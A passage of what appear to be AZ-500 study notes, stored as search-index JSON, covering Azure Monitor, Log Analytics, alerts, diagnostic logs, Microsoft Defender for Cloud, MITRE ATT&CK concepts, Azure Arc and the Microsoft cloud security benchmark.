        • Custom metrics:\u00a0You can define metrics in addition to the standard metrics that are automatically available. You can define custom metrics in your application that are monitored by Application Insights. You can also create custom metrics for an Azure service by using the custom metrics Application Programming Interface (API).
        • Kubernetes clusters:\u00a0Kubernetes clusters typically send metric data to a local Prometheus server that you must maintain. Azure Monitor managed service for Prometheus provides a managed service that collects metrics from Kubernetes clusters and stores them in Azure Monitor Metrics.

        A common type of log entry is an event, which is collected sporadically.

        Applications can create custom logs by using the structure that they need.

        Metric data can even be stored in Logs to combine them with other monitoring data for trending and other data analysis.

        KQL (Kusto query language). - Data in Azure Monitor Logs is retrieved using a log query written with the Kusto query language, which allows you to quickly retrieve, consolidate, and analyze collected data. \u00a0Use Log Analytics to write and test log queries in the Azure portal. It allows you to work with results interactively or pin them to a dashboard to view them with other visualizations.

        Security tools use of Monitor logs:

        • Microsoft Defender for Cloud\u00a0stores data that it collects in a Log Analytics workspace where it can be analyzed with other log data.
        • Azure Sentinel\u00a0stores data from data sources into a Log Analytics workspace.
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#13-enable-log-analytics","title":"1.3. Enable Log Analytics","text":"

        Log Analytics is the primary tool in the Azure portal for writing log queries and interactively analyzing their results. Even if a log query is used elsewhere in Azure Monitor, you'll typically write and test the query first using Log Analytics.

        You can start Log Analytics from several places in the Azure portal. The scope of the data available to Log Analytics is determined by how you start it.

        • Select Logs from the Azure Monitor menu or Log Analytics workspaces menu.
        • Select Analytics from the Overview page of an Application Insights application.
        • Select Logs from the menu of an Azure resource.

        In addition to interactively working with log queries and their results in Log Analytics, areas in Azure Monitor where you will use queries include the following:

        • Alert rules. Alert rules proactively identify issues from data in your workspace. Each alert rule is based on a log search that is automatically run at regular intervals. The results are inspected to determine if an alert should be created.
        • Dashboards. You can pin the results of any query into an Azure dashboard which allow you to visualize log and metric data together and optionally share with other Azure users.
        • Views. You can create visualizations of data to be included in user dashboards with View Designer. Log queries provide the data used by tiles and visualization parts in each view.
        • Export. When you import log data from Azure Monitor into Excel or Power BI, you create a log query to define the data to export.
        • PowerShell. Use the results of a log query in a PowerShell script from a command line or an Azure Automation runbook that uses\u00a0Invoke-AzOperationalInsightsQuery.
        • Azure Monitor Logs API. The Azure Monitor Logs API allows any REST API client to retrieve log data from the workspace. The API request includes a query that is run against Azure Monitor to determine the data to retrieve.

        At the center of Log Analytics is the Log Analytics workspace, which is hosted in Azure. - - Log Analytics collects data in the workspace from connected sources by configuring data sources and adding solutions to your subscription. - Data sources and solutions each create different record types, each with its own set of properties. - You can still analyze sources and solutions together in queries to the workspace. - A Log Analytics workspace is a unique environment for Azure Monitor log data. - \u00a0Each workspace has its own data repository and configuration, and data sources and solutions are configured to store their data in a particular workspace. - \u00a0You require a Log Analytics workspace if you intend on collecting data from the following sources: - Azure resources in your subscription - On-premises computers monitored by System Center Operations Manager - Device collections from Configuration Manager - Diagnostics or log data from Azure storage

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#14-manage-connected-sources-for-log-analytics","title":"1.4. Manage connected sources for log analytics","text":"
        • The Azure Log Analytics agent was developed for comprehensive management across virtual machines in any cloud, on-premises machines, and those monitored by System Center Operations Manager.
        • The Windows and Linux agents send collected data from different sources to your Log Analytics workspace in Azure Monitor, as well as any unique logs or metrics as defined in a monitoring solution.
        • The Log Analytics agent also supports insights and other services in Azure Monitor such as Azure Monitor for VMs, Microsoft Defender for Cloud, and Azure Automation.

        There is something else called Azure diagnostics extension, that basically collects monitoring data from the guest operating system of Azure virtual machines. Differences:

        Azure Diagnostics Extension Log Analytics agent Used only with Azure virtual machines. Used with virtual machines in Azure, other clouds, and on-premises. Sends data to Azure Storage, Azure Monitor Metrics (Windows only) and Event Hubs. Sends data to Azure Monitor Logs (to an Log Analytics Workspace). Not required specifically Required for: Azure Monitor for VMs, and other services such as Microsoft Defender for Cloud.

        The Windows agent can be multihomed to send data to multiple workspaces and System Center Operations Manager management groups. The Linux agent can send to only a single destination. The agent for Linux and Windows isn't only for connecting to Azure Monitor, it also supports Azure Automation to host the Hybrid Runbook worker role and other services such as Change Tracking, Update Management, and Microsoft Defender for Cloud.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#15-enable-azure-monitor-alerts","title":"1.5. Enable Azure monitor Alerts","text":"

        Azure monitor has metrics, logging, and analytics features. Another feature is Monitor Alerts.

        Alerts in Azure Monitor proactively notify you of critical conditions and potentially attempt to take corrective action. Alert rules based on metrics provide near real time alerting based on numeric values, while rules based on logs allow for complex logic across data from multiple sources.

        The unified alert experience in Azure Monitor includes alerts that were previously managed by Log Analytics and Application Insights. In the past, Azure Monitor, Application Insights, Log Analytics, and Service Health had separate alerting capabilities. Over time, Azure improved and combined both the user interface and different methods of alerting. The consolidation is still in process.

        • The alert rule captures the target and criteria for alerting. \u00a0The alert rule can be in an enabled or a disabled state. Alerts only fire when enabled.
        • Target Resource: Defines the scope and signals available for alerting. A target can be any Azure resource. Example targets: a virtual machine, a storage account, a virtual machine scale set, a Log Analytics workspace, or an Application Insights resource. For certain resources (like virtual machines), you can specify multiple resources as the target of the alert rule.
        • Signal: Emitted by the target resource. Signals can be of the following types: metric, activity log, Application Insights, and log.
        • Criteria: A combination of signal and logic applied on a target resource. Examples:
          • Percentage CPU > 70%
          • Server Response Time > 4 ms
          • Result count of a log query > 100
        • Alert Name: A specific name for the alert rule configured by the user.
        • Alert Description: A description for the alert rule configured by the user.
        • Severity: The severity of the alert after the criteria specified in the alert rule is met. Severity can range from 0 to 4.
          • Sev 0 = Critical
          • Sev 1 = Error
          • Sev 2 = Warning
          • Sev 3 = Informational
          • Sev 4 = Verbose
        • Action: A specific action taken when the alert is fired.

        You can alert on metrics and logs. These include but are not limited to:

        • Metric values
        • Log search queries
        • Activity log events
        • Health of the underlying Azure platform
        • Tests for website availability

        With the consolidation of alerting services still in process, there are some alerting capabilities that are not yet in the new alerts system.

        Monitor source Signal type Description Service health Activity log Not supported. View Create activity log alerts on service notifications. Application Insights Web availability tests Not supported. View Web test alerts. Available to any website that's instrumented to send data to Application Insights. Receive a notification when availability or responsiveness of a website is below expectations.","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#16-create-diagnostic-settings-in-azure-portal","title":"1.6. Create diagnostic settings in Azure portal","text":"

        Azure Monitor diagnostic logs are logs produced by an Azure service that provide rich, frequently collected data about the operation of that service. Azure Monitor makes two types of diagnostic logs available:

        • Tenant logs. These logs come from tenant-level services that exist outside an Azure subscription, such as Microsoft Entra ID.
        • Resource logs. These logs come from Azure services that deploy resources within an Azure subscription, such as Network Security Groups (NSGs) or storage accounts.

        These logs differ from the\u00a0activity log. The activity log provides insight into the operations, such as creating a VM or deleting a logic app, that Azure Resource Manager performed on resources in your subscription using. The activity log is a subscription-level log. Resource-level diagnostic logs provide insight into operations that were performed within that resource itself, such as getting a secret from a key vault.

        These logs also differ from\u00a0guest operating system (OS)\u2013level diagnostic logs. Guest OS diagnostic logs are those collected by an agent running inside a VM or other supported resource type. Resource-level diagnostic logs require no agent and capture resource-specific data from the Azure platform itself, whereas guest OS\u2013level diagnostic logs capture data from the OS and applications running on a VM.

        You can configure diagnostic settings in the Azure portal either from the Azure Monitor menu or from the menu for the resource.

        Here are some of the things you can do with diagnostic logs:

        • Save them to a storage account for auditing or manual inspection. You can specify the retention time (in days) by using resource diagnostic settings.
        • Stream them to event hubs for ingestion by a third-party service or custom analytics solution, such as Power BI.
        • Analyze them with Azure Monitor, such that the data is immediately written to Azure Monitor with no need to first write the data to storage.
        • An event hub is created in the namespace for each log category you enable. A diagnostic log category is a type of log that a resource may collect.

        Kusto Query Language. All data is retrieved from a Log Analytics workspace using a log query written using Kusto Query Language (KQL). You can write your own queries or use solutions and insights that include log queries for an application or service.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#2-enable-and-manage-microsoft-defender-for-cloud","title":"2. Enable and manage Microsoft Defender for Cloud","text":"

        Microsoft Defender for Cloud is your central location for setting and monitoring your organization's security posture.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#21-the-mitre-attack-matrix","title":"2.1. The MITRE Attack matrix","text":"

        The MITRE ATT&CK matrix is a\u00a0publicly accessible knowledge base\u00a0for understanding the various\u00a0tactics\u00a0and\u00a0techniques\u00a0used by attackers during a cyberattack.

        The knowledge base is organized into several categories:\u00a0pre-attack,\u00a0initial access,\u00a0execution,\u00a0persistence,\u00a0privilege escalation,\u00a0defense evasion,\u00a0credential access,\u00a0discovery,\u00a0lateral movement,\u00a0collection,\u00a0exfiltration, and\u00a0command and control.

        Tactics (T)\u00a0represent the \"why\" of an ATT&CK technique or sub-technique. It is the adversary's tactical goal: the reason for performing an action.\u00a0For example, an adversary may want to achieve credential access.

        Techniques (T)\u00a0represent \"how'\" an adversary achieves a tactical goal by performing an action.\u00a0For example, an adversary may dump credentials to achieve credential access.

        Common Knowledge (CK)\u00a0in ATT&CK stands for common knowledge, essentially the documented modus operandi of tactics and techniques executed by adversaries.

        Defender for Cloud\u00a0uses the MITRE Attack matrix to associate alerts with their perceived intent, helping formalize security domain knowledge.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#22-implement-microsoft-defender-for-cloud","title":"2.2. Implement Microsoft Defender for Cloud","text":"

        Microsoft Defender for Cloud is a solution for\u00a0cloud security posture management (CSPM)\u00a0and\u00a0cloud workload protection (CWP)\u00a0that finds weak spots across your cloud configuration, helps strengthen the overall security posture of your environment, and can protect workloads across multicloud and hybrid environments from evolving threats.

        When necessary, Defender for Cloud can automatically deploy a Log Analytics agent to gather security-related data. For Azure machines, deployment is handled directly. For hybrid and multicloud environments,\u00a0Microsoft Defender plans are extended to non-Azure machines\u00a0with the help of\u00a0Azure Arc.\u00a0Cloud Security Posture Management (CSPM) features\u00a0are extended to multicloud machines without the need for any agents.

        In addition to defending your Azure environment, you can\u00a0add Defender for Cloud capabilities to your hybrid cloud environment to protect your non-Azure servers. To\u00a0extend protection\u00a0to on-premises machines,\u00a0deploy Azure Arc\u00a0and\u00a0enable Defender for Cloud's enhanced security features.

        For example, if you've connected an Amazon Web Services (AWS) account to an Azure subscription, you can enable any of these protections:

        • Defender for Cloud's CSPM features\u00a0extend to your AWS resources. This agentless plan assesses your AWS resources according to AWS-specific security recommendations, and these are included in your secure score. The resources will also be assessed for compliance with built-in standards specific to\u00a0AWS (AWS Center for Internet Security (CIS),\u00a0AWS Payment Card Industry (PCI) Data Security Standards (DSS), and\u00a0AWS Foundational Security Best Practices). Defender for Cloud's asset inventory page is a multicloud enabled feature helping you manage your AWS resources alongside your Azure resources.
        • Microsoft Defender for Kubernetes extends\u00a0its container threat detection and advanced defenses to your Amazon Elastic Kubernetes Service (EKS) Linux clusters.
        • Microsoft Defender for Servers\u00a0brings threat detection and advanced defenses to your Windows and Linux Elastic Compute Cloud 2 (EC2) instances. This plan includes the integrated license for Microsoft Defender for Endpoint, security baselines, and OS level assessments, vulnerability assessment scanning, adaptive application controls (AAC), file integrity monitoring (FIM), and more.

        Defender for Cloud includes vulnerability assessment solutions for\u00a0virtual machines, container registries, and\u00a0SQL servers\u00a0as part of the enhanced security features. Some of the scanners are powered by Qualys. But you don't need a Qualys license or even a Qualys account - everything's handled seamlessly inside Defender for Cloud.

        Microsoft Defender for Servers includes automatic, native integration with Microsoft Defender for Endpoint. With this integration enabled, you'll have access to the vulnerability findings from Microsoft Defender Vulnerability Management.

        The list of recommendations is enabled and supported by the Microsoft cloud security benchmark. This Microsoft-authored benchmark, based on common compliance frameworks, began with Azure and now provides a set of guidelines for security and compliance best practices for multiple cloud environments. In this way, Defender for Cloud enables you not just to set security policies but to\u00a0apply secure configuration standards across your resources.

        Microsoft Defender for the\u00a0Internet of Things (IoT)\u00a0is a separate product.

        The\u00a0Defender plans\u00a0of Microsoft Defender for Cloud offer comprehensive defenses for the\u00a0compute,\u00a0data, and\u00a0service layers\u00a0of your environment:

        • Microsoft Defender for Servers
        • Microsoft Defender for Storage
        • Microsoft Defender for Structured Query Language (SQL)
        • Microsoft Defender for Containers
        • Microsoft Defender for App Service
        • Microsoft Defender for Key Vault
        • Microsoft Defender for Resource Manager
        • Microsoft Defender for Domain Name System (DNS)
        • Microsoft Defender for open-source relational databases
        • Microsoft Defender for Azure Cosmos Database (DB)
        • Defender Cloud Security Posture Management (CSPM)
          • Security governance and regulatory compliance
          • Cloud security explorer
          • Attack path analysis
          • Agentless scanning for machines
        • Defender for DevOps
        • Security alerts\u00a0- When Defender for Cloud\u00a0detects a threat\u00a0in any area of your environment, it\u00a0generates a security alert. These alerts describe details of the\u00a0affected resources,\u00a0suggested remediation steps, and in some cases, an\u00a0option to trigger a logic app in response. Whether an alert is generated by Defender for Cloud or received by Defender for Cloud from an integrated security product, you can export it. To export your alerts to Microsoft Sentinel, any third-party Security information and event management (SIEM), or any other external tool, follow the instructions in Stream alerts to a SIEM, Security orchestration, automation and response (SOAR), or IT Service Management solution. Defender for Cloud's threat protection includes\u00a0fusion kill-chain analysis, which automatically correlates alerts in your environment based on cyber kill-chain analysis, to help you better understand the full story of an attack campaign, where it started, and what kind of impact it had on your resources.\u00a0Defender for Cloud's supported kill chain intents are based on version 9 of the MITRE ATT&CK matrix.
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#23-cloud-security-posture-management-cspm-remediate-security-issues-and-watch-your-security-posture-improve-security-posture-tab-regulatory-compliance-tab","title":"2.3. Cloud Security Posture Management (CSPM) - Remediate security issues and watch your security posture improve - Security posture tab + Regulatory compliance tab","text":"

        Defender for Cloud continually assesses your resources, subscriptions, and organization for security issues and shows your security posture in the secure score, an aggregated score of the security findings that tells you, at a glance, your current security situation: the higher the score, the lower the identified risk level.

        • Generates a secure score\u00a0for your subscriptions based on an assessment of your connected resources compared with the guidance in the\u00a0Microsoft cloud security benchmark.
        • Provides hardening recommendations\u00a0based on any\u00a0identified security misconfigurations\u00a0and\u00a0weaknesses.
        • Analyzes and secure's your attack paths\u00a0through the cloud security graph, which is a graph-based context engine that exists within Defender for Cloud. The cloud security graph collects data from your multicloud environment and other data sources.
        • Attack path analysis is a\u00a0graph-based algorithm that scans the cloud security graph. The\u00a0scans expose exploitable paths attackers may use to breach your environment to reach your high-impact assets.
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#24-workload-protections-tab","title":"2.4. Workload protections tab","text":"

        Defender for Cloud offers security alerts that are powered by Microsoft Threat Intelligence. It also includes a range of advanced, intelligent protections for your workloads. The workload protections are provided through Microsoft Defender plans specific to the types of resources in your subscriptions.

        The Cloud workload dashboard includes the following sections:

        1. Microsoft Defender for Cloud coverage\u00a0- Here you can see the resources types in your subscription that are eligible for protection by Defender for Cloud. Wherever relevant, you can upgrade here as well. If you want to upgrade all possible eligible resources, select\u00a0Upgrade all.
        2. Security alerts\u00a0- When Defender for Cloud detects a threat in any area of your environment, it generates an alert. These alerts describe details of the affected resources, suggested remediation steps, and in some cases an option to\u00a0trigger a logic app\u00a0in response. Selecting anywhere in this graph opens the Security alerts page.
        3. Advanced protection\u00a0- Defender for Cloud includes many advanced threat protection capabilities for virtual machines,\u00a0Structured Query Language (SQL)\u00a0databases, containers, web applications, your network, and more. In this advanced protection section, you can see the status of the resources in your selected subscriptions for each of these protections. Select any of them to go directly to the configuration area for that protection type.
        4. Insights\u00a0- This rolling pane of news, suggested reading, and high priority alerts gives Defender for Cloud's insights into pressing security matters that are relevant to you and your subscription. Whether it's a list of high severity\u00a0Common Vulnerabilities and Exposures (CVEs)\u00a0discovered on your VMs by a vulnerability analysis tool, or a new blog post by a member of the Defender for Cloud team, you'll find it here in the Insights panel.
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#25-deploy-microsoft-defender-for-cloud","title":"2.5. Deploy Microsoft Defender for Cloud","text":"

        Defender for Cloud provides foundational\u00a0cloud security and posture management (CSPM)\u00a0features by default.

        Defender for cloud\u00a0offers foundational multicloud CSPM capabilities for free. The foundational CSPM includes a\u00a0secure score,\u00a0security policy and basic recommendations, and\u00a0network security assessment\u00a0to help you\u00a0protect your Azure resources.

        The optional Defender CSPM plan provides advanced posture management capabilities such as\u00a0Attack path analysis,\u00a0Cloud security explorer,\u00a0advanced threat hunting,\u00a0security governance capabilities, and also tools to assess your security compliance with a wide range of benchmarks, regulatory standards, and any custom security policies required in your organization, industry, or region.

        When you enabled Defender plans on an entire Azure subscription, the protections are inherited by all resources in the subscription. When you enable the enhanced security features (paid), Defender for Cloud can provide unified security management and threat protection across your hybrid cloud workloads, including:

        • Microsoft Defender for Endpoint\u00a0- Microsoft Defender for Servers includes Microsoft Defender for Endpoint for comprehensive endpoint detection and response (EDR).

        • Vulnerability assessment for virtual machines, container registries, and SQL resources

        • Multicloud security\u00a0- Connect your accounts from Amazon Web Services (AWS) and Google Cloud Platform (GCP) to protect resources and workloads on those platforms with a range of Microsoft Defender for Cloud security features.

        • Hybrid security\u00a0\u2013 Get a unified view of security across all of your on-premises and cloud workloads.

        • Threat protection alerts\u00a0- Advanced behavioral analytics and the Microsoft Intelligent Security Graph provide an edge over evolving cyber-attacks. Built-in behavioral analytics and machine learning can identify attacks and zero-day exploits. Monitor networks, machines, data stores (SQL servers hosted inside and outside Azure, Azure SQL databases, Azure SQL Managed Instance, and Azure Storage), and cloud services for incoming attacks and post-breach activity. Streamline investigation with interactive tools and contextual threat intelligence.

        • Track compliance with a range of standards\u00a0- Defender for Cloud continuously assesses your hybrid cloud environment to analyze the risk factors according to the controls and best practices in the Microsoft cloud security benchmark. When you enable enhanced security features, you can apply a range of other industry standards, regulatory standards, and benchmarks according to your organization's needs. Add standards and track your compliance with them from the regulatory compliance dashboard.

        • Access and application controls\u00a0- Block malware and other unwanted applications by applying machine learning-powered recommendations adapted to your specific workloads to create allowlists and blocklists. Reduce the network attack surface with just-in-time, controlled access to management ports on Azure VMs. Access and application control drastically reduce exposure to brute force and other network attacks.

        • Container security features\u00a0- Benefit from vulnerability management and real-time threat protection in your containerized environments. Charges are based on the number of unique container images pushed to your connected registry. After an image has been scanned once, you won't be charged for it again unless it's modified and pushed once more.

        • Breadth threat protection for resources connected to Azure\u00a0- Cloud-native threat protection for the Azure services common to all of your resources: Azure Resource Manager, Azure Domain Name System (DNS), Azure network layer, and Azure Key Vault. Defender for Cloud has unique visibility into the Azure management layer and the Azure DNS layer and can therefore protect cloud resources that are connected to those layers.

        Manage your Cloud Security Posture Management (CSPM)\u00a0- CSPM offers you the ability to remediate security issues and review your security posture through the tools provided. These tools include:

        • Security governance and regulatory compliance
          • What is Security governance and regulatory compliance? Security governance and regulatory compliance refer to the policies and processes which organizations have in place to ensure that they comply with laws, rules, and regulations put in place by external bodies (government) that control activity in a given jurisdiction. Defender for Cloud allows you to view your regulatory compliance through the regulatory compliance dashboard. Defender for Cloud continuously assesses your hybrid cloud environment to analyze the risk factors according to the controls and best practices in the standards you've applied to your subscriptions. The dashboard reflects the status of your compliance with these standards.
        • Cloud security graph
          • What is a cloud security graph? The cloud security graph is a\u00a0graph-based context engine\u00a0that exists within Defender for Cloud. The cloud security graph collects data from your multicloud environment and other data sources.\u00a0For example, the cloud assets inventory, connections and lateral movement possibilities between resources, exposure to the internet, permissions, network connections, vulnerabilities, and more. The data collected is then used to build a graph representing your multicloud environment. Defender for Cloud then uses the generated graph to perform an attack path analysis and find the issues with the highest risk that exist within your environment. You can also query the graph using the cloud security explorer.
        • Attack path analysis
          • What is Attack path analysis? Attack path analysis helps you to\u00a0address the security issues that pose immediate threats with the greatest potential of being exploited in your environment. Defender for Cloud analyzes which security issues are part of potential attack paths that attackers could use to breach your environment. It also highlights the security recommendations that need to be resolved in order to mitigate the issue.
        • Agentless scanning for machines
          • What is agentless scanning for machines? Microsoft Defender for Cloud maximizes coverage on OS posture issues and extends beyond the reach of agent-based assessments. With agentless scanning for VMs, you can get frictionless, wide, and instant visibility on actionable posture issues without installed agents, network connectivity requirements, or machine performance impact.\u00a0Agentless scanning for VMs provides vulnerability assessment and software inventory\u00a0powered by Defender vulnerability management in Azure and Amazon AWS environments. Agentless scanning is available in Defender Cloud Security Posture Management (CSPM) and Defender for Servers.
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#26-azure-arc","title":"2.6. Azure Arc","text":"

        Azure Arc provides a centralized, unified way to:

        • Manage your entire environment together by projecting your existing non-Azure and/or on-premises resources into Azure Resource Manager.
        • Manage virtual machines, Kubernetes clusters, and databases as if they are running in Azure.
        • Use familiar Azure services and management capabilities, regardless of where they live.
        • Continue using traditional IT operations (ITOps) while introducing DevOps practices to support new cloud-native patterns in your environment.
        • Configure custom locations as an abstraction layer on top of Azure Arc-enabled Kubernetes clusters and cluster extensions.

        Currently, Azure Arc allows you to manage the following resource types hosted outside of Azure:

        • Servers: Manage Windows and Linux physical servers and virtual machines hosted outside of Azure.
        • Kubernetes clusters: Attach and configure Kubernetes clusters running anywhere with multiple supported distributions.
        • Azure data services: Run Azure data services on-premises, at the edge, and in public clouds using Kubernetes and the infrastructure of your choice. SQL Managed Instance and PostgreSQL server (preview) services are currently available.
        • SQL Server: Extend Azure services to SQL Server instances hosted outside of Azure.
        • Virtual machines (preview): Provision, resize, delete, and manage virtual machines based on VMware vSphere or Azure Stack\u00a0hyper-converged infrastructure (HCI)\u00a0and enable VM self-service through role-based access.

        Some of the key scenarios that Azure Arc supports are:

        • Implement consistent inventory, management, governance, and security for servers across your environment.
        • Configure Azure VM extensions to use Azure management services to monitor, secure, and update your servers.
        • Manage and govern Kubernetes clusters at scale.
        • Use GitOps to deploy configuration across one or more clusters from Git repositories.
        • Zero-touch compliance and configuration for Kubernetes clusters using Azure Policy.
        • Run Azure data services on any Kubernetes environment as if it runs in Azure (specifically Azure SQL Managed Instance and Azure Database for PostgreSQL server, with benefits such as upgrades, updates, security, and monitoring). Use elastic scale and apply updates without any application downtime, even without continuous connection to Azure.
        • Create custom locations on top of your Azure Arc-enabled Kubernetes clusters, using them as target locations for deploying Azure services instances. Deploy your Azure service cluster extensions for Azure Arc-enabled data services, App services on Azure Arc (including web, function, and logic apps), and Event Grid on Kubernetes.
        • Perform virtual machine lifecycle and management operations for VMware vSphere and Azure Stack\u00a0hyper-converged infrastructure (HCI)\u00a0environments.
        • A unified experience viewing your Azure Arc-enabled resources, whether you are using the Azure portal, the Azure CLI, Azure PowerShell, or Azure REST API.
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#27-microsoft-cloud-security-benchmark","title":"2.7. Microsoft cloud security benchmark","text":"

        Located at Defender > Regulatory compliance

        The\u00a0Microsoft cloud security benchmark (MCSB)\u00a0provides\u00a0prescriptive best practices\u00a0and\u00a0recommendations\u00a0to help improve the security of workloads, data, and services on Azure and your multi-cloud environment, focusing on cloud-centric control areas with input from a set of holistic Microsoft and industry security guidance that includes:

        • Cloud Adoption Framework: Guidance on\u00a0security, including\u00a0strategy,\u00a0roles\u00a0and\u00a0responsibilities,\u00a0Azure Top 10 Security Best Practices, and\u00a0reference implementation.
        • Azure Well-Architected Framework: Guidance on securing your workloads on Azure.
        • The Chief Information Security Officer (CISO) Workshop: Program guidance and reference strategies to accelerate security modernization using Zero Trust principles.
        • Other industry and cloud service provider's security best practice standards and framework: Examples include the Amazon Web Services (AWS) Well-Architected Framework, Center for Internet Security (CIS) Controls, National Institute of Standards and Technology (NIST), and Payment Card Industry Data Security Standard (PCI-DSS).
        Control Domains Description Network security (NS) Network Security\u00a0covers controls to secure and protect networks, including securing virtual networks, establishing private connections, preventing and mitigating external attacks, and securing Domain Name System (DNS). Identity Management (IM) Identity Management\u00a0covers controls to establish a secure identity and access controls using identity and access management systems, including the use of single sign-on, strong authentications, managed identities (and service principals) for applications, conditional access, and account anomalies monitoring. Privileged Access (PA) Privileged Access\u00a0covers controls to protect privileged access to your tenant and resources, including a range of controls to protect your administrative model, administrative accounts, and privileged access workstations against deliberate and inadvertent risk. Data Protection (DP) Data Protection\u00a0covers control of data protection at rest, in transit, and via authorized access mechanisms, including discover, classify, protect, and monitoring sensitive data assets using access control, encryption, key management, and certificate management. Asset Management (AM) Asset Management\u00a0covers controls to ensure security visibility and governance over your resources, including recommendations on permissions for security personnel, security access to asset inventory and managing approvals for services and resources (inventory,\u00a0track, and\u00a0correct). Logging and Threat Detection (LT) Logging and Threat Detection\u00a0covers controls for detecting threats on the cloud and enabling, collecting, and storing audit logs for cloud services, including enabling detection, investigation, and remediation processes with controls to generate high-quality alerts with native threat detection in cloud services; it also includes collecting logs with a cloud monitoring service, centralizing security analysis with a\u00a0security event management (SEM), time synchronization, and log retention. Incident Response (IR) Incident Response\u00a0covers controls in the incident response life cycle - preparation, detection and analysis, containment, and post-incident activities, including using Azure services (such as Microsoft Defender for Cloud and Sentinel) and/or other cloud services to automate the incident response process. Posture and Vulnerability Management (PV) Posture and Vulnerability Management\u00a0focuses on controls for assessing and improving the cloud security posture, including vulnerability scanning, penetration testing, and remediation, as well as security configuration tracking, reporting, and correction in cloud resources. Endpoint Security (ES) Endpoint Security\u00a0covers controls in endpoint detection and response, including the use of endpoint detection and response (EDR) and anti-malware service for endpoints in cloud environments. Backup and Recovery (BR) Backup and Recovery\u00a0covers controls to ensure that data and configuration backups at the different service tiers are performed, validated, and protected. DevOps Security (DS) DevOps Security\u00a0covers the controls related to the security engineering and operations in the DevOps processes, including deployment of critical security checks (such as static application security testing and vulnerability management) prior to the deployment phase to ensure the security throughout the DevOps process; it also includes common topics such as threat modeling and software supply security. Governance and Strategy (GS) Governance and Strategy\u00a0provides guidance for ensuring a coherent security strategy and documented governance approach to guide and sustain security assurance, including establishing roles and responsibilities for the different cloud security functions, unified technical strategy, and supporting policies and standards.","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#28-security-policies-and-defender-for-cloud-initiatives","title":"2.8. Security policies and Defender for Cloud initiatives","text":"

        Like security policies, Defender for Cloud initiatives are also created in Azure Policy. You can use\u00a0Azure Policy\u00a0to manage your policies, build initiatives, and assign initiatives to multiple subscriptions or entire management groups.

        The default initiative automatically assigned to every subscription in Microsoft Defender for Cloud is the Microsoft cloud security benchmark.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#29-view-and-edit-security-policies","title":"2.9. View and edit security policies","text":"

        There are two specific roles for Defender for Cloud:

        1. Security Administrator: Has the same view rights as security reader. Can also update the security policy and dismiss alerts.
        2. Security reader: Has rights to view Defender for Cloud items such as recommendations, alerts, policy, and health. Can't make changes.

        You can edit security policies through the\u00a0Azure Policy portal\u00a0via\u00a0Representational State Transfer Application Programming Interface (REST API)\u00a0or using\u00a0Windows PowerShell.

        The Security Policy screen reflects the action taken by the policies assigned to the subscription or management group you selected.

        • Use the links at the top to open a policy assignment that applies to the subscription or management group. These links let you access the assignment and edit or disable the policy.\u00a0For example, if you see that a particular policy assignment is effectively denying endpoint protection, use the link to edit or disable the policy.
        • In the list of policies, you can see the effective application of the policy on your subscription or management group. The settings of each policy that apply to the scope are taken into consideration, and the cumulative outcome of actions taken by the policy is shown.\u00a0For example, if one assignment of the policy is disabled, but in another, it's set to\u00a0AuditIfNotExist, then the cumulative effect applies\u00a0AuditIfNotExist. The more active effect always takes precedence.
        • The policies' effect can be:\u00a0Append,\u00a0Audit,\u00a0AuditIfNotExists,\u00a0Deny,\u00a0DeployIfNotExists, or\u00a0Disabled.
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#210-microsoft-defender-for-cloud-recommendations","title":"2.10. Microsoft Defender for Cloud recommendations","text":"

        In practice, it works like this:

        1. Microsoft Cloud security benchmark is an\u00a0initiative\u00a0that contains requirements.

          For example, Azure Storage accounts must restrict network access to reduce their attack surface.

        2. The initiative includes multiple\u00a0policies, each requiring a specific resource type. These policies enforce the requirements in the initiative.

          To continue the example, the storage requirement is enforced with the policy \"Storage accounts should restrict network access using virtual network rules.\"

        3. Microsoft Defender for Cloud continually assesses your connected subscriptions. If it finds a resource that doesn't satisfy a policy, it displays a\u00a0recommendation\u00a0to fix that situation and harden the security of resources that aren't meeting your security requirements.

          For example, if an Azure Storage account on your protected subscriptions isn't protected with virtual network rules, you see the recommendation to harden those resources.

        So, (1)\u00a0an initiative includes\u00a0(2)\u00a0policies that generate\u00a0(3)\u00a0environment-specific recommendations.

        Defender for Cloud continually assesses your cross-cloud resources for security issues. It then\u00a0aggregates all the findings into a single score\u00a0so that you can tell, at a glance, your current security situation: the\u00a0higher the score, the\u00a0lower the identified risk level.

        In the Azure mobile app, the secure score is shown as a percentage value, and you can tap the secure score to see the details that explain the score:

        To increase your security, review Defender for Cloud's\u00a0recommendations page\u00a0and remediate the recommendation by implementing the remediation instructions for each issue.\u00a0Recommendations are grouped into security controls. Each control is a\u00a0logical group of related security recommendations\u00a0and\u00a0reflects your vulnerable attack surfaces. Your score only improves when you\u00a0remediate all\u00a0of the recommendations for a\u00a0single resource within a control.

        • Insights - Gives you extra details for each recommendation, such as:

          • Preview recommendation\u00a0- This recommendation won't affect your secure score until\u00a0general availability (GA).
          • Fix\u00a0- From within the recommendation details page, you can use 'Fix' to resolve this issue.
          • Enforce\u00a0- From within the recommendation details page, you can automatically deploy a policy to fix this issue whenever someone creates a non-compliant resource.
